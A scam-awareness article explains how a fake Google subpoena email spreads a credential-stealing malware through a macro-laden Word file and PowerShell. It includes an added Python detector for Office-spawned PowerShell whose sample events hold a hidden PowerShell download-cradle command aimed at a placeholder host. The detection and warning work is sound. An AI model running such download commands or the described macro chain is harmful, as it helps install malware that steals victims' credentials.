Google Subpoena Email Scam: How It Works

Beware of a fake Google subpoena email scam that has been circulating on the internet recently. What does it look like? It arrives as an email carrying a subpoena notice from Google, stating that you have been accessing the wrong links on the web. Let’s see how the scam works.

The email says that you have been “ordered to go to court.” You can see a screenshot of the fake Google citation email below.

The message urges you to prepare all the necessary documents for your court appearance. The attachment that supposedly lists those documents is nothing more than a compromised zip folder that installs malware on your device. A link with supposedly additional details is also provided. This malicious link leads to a list on Google Drive where you can access the content (don’t!).

The scammer claims to give you 14 days to prepare, otherwise “the court will be held without you.” The grammatical errors alone should be enough to treat this Google citation as a red flag.

So what happens if you open the folder with the fake documents? Like another citation-related scam that made the rounds in November 2019, this one installs malware on computers.

How bad can the email be?

The malicious folder and the email link both lead through a redirect chain to a macro-laden Microsoft Word file. The macro then uses PowerShell to download the malware sample.

The Google Subpoena email scam malware infects the endpoint and leaks your personal information. It mainly targets network settings, browser information, cryptocurrency wallets, VPN and FTP logins, emails, and gaming credentials. Last but not least, it takes screenshots of your compromised device.
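For defenders, the step where the Word macro launches PowerShell is the easiest point in this chain to catch in process-creation logs. The following is an added example, not part of the original article: it flags PowerShell processes descended from an Office application, even through an intermediate process. The event field names and all sample events are constructed assumptions.

```python
import re
from pathlib import PureWindowsPath

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Command-line hints that PowerShell is fetching a payload or hiding its script.
DOWNLOAD_HINTS = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|net\.webclient|"
    r"start-bitstransfer|\s-enc", re.I)

def _name(path):
    return PureWindowsPath(path).name.lower()

def office_ancestor(event, by_pid, max_depth=8):
    """Walk parent links so an intermediate cmd.exe does not hide the Office parent."""
    pid, seen = event["ppid"], set()
    while pid in by_pid and pid not in seen and len(seen) < max_depth:
        seen.add(pid)
        parent = by_pid[pid]
        if _name(parent["image"]) in OFFICE:
            return parent
        pid = parent["ppid"]
    return None

def find_macro_powershell(events):
    """Return (pid, severity, office_image) for PowerShell descended from Office."""
    by_pid = {e["pid"]: e for e in events}  # assumes no PID reuse within the batch
    alerts = []
    for e in events:
        if _name(e["image"]) not in POWERSHELL:
            continue
        office = office_ancestor(e, by_pid)
        if office is None:
            continue
        severity = "high" if DOWNLOAD_HINTS.search(e["cmdline"]) else "medium"
        alerts.append((e["pid"], severity, _name(office["image"])))
    return alerts

# Constructed sample events; the field names are assumptions, not a real log schema.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "cmdline": r'WINWORD.EXE "C:\Users\a\Downloads\documents.doc"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c powershell"},
    {"pid": 400, "ppid": 300, "image": PS, "cmdline": "powershell -w hidden (New-Object Net.WebClient).DownloadFile('http://example.invalid/a','a')"},
    {"pid": 500, "ppid": 100, "image": PS, "cmdline": "powershell Get-Process"},
    {"pid": 600, "ppid": 200, "image": PS, "cmdline": "powershell Get-Date"},
]
```

PowerShell started by the user from Explorer (pid 500) is not flagged; only the processes that trace back to Word are.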

Google Citation Notice – How to Avoid It

There is no such thing as a Google subpoena notice. Delete the email (and, if you wish, report it; see below) and get on with your day. This bogus Google citation is more dangerous than the usual email scams or phishing scams, so be careful.

Your personal information can only be stolen if the chain of infection is successful. What does that mean? The goal is to get victims to click on the link and then download the “documents”, which contain the macros. Essentially, as mentioned, by downloading the file you enable these macros, which means that you allow the malware to access whatever it wants. Stay away.

Google Citation: How to Report a Scammer

Inform your family and friends about this scam by sharing this article on social media. You can also officially report scammers and any other suspicious activity to the Federal Trade Commission.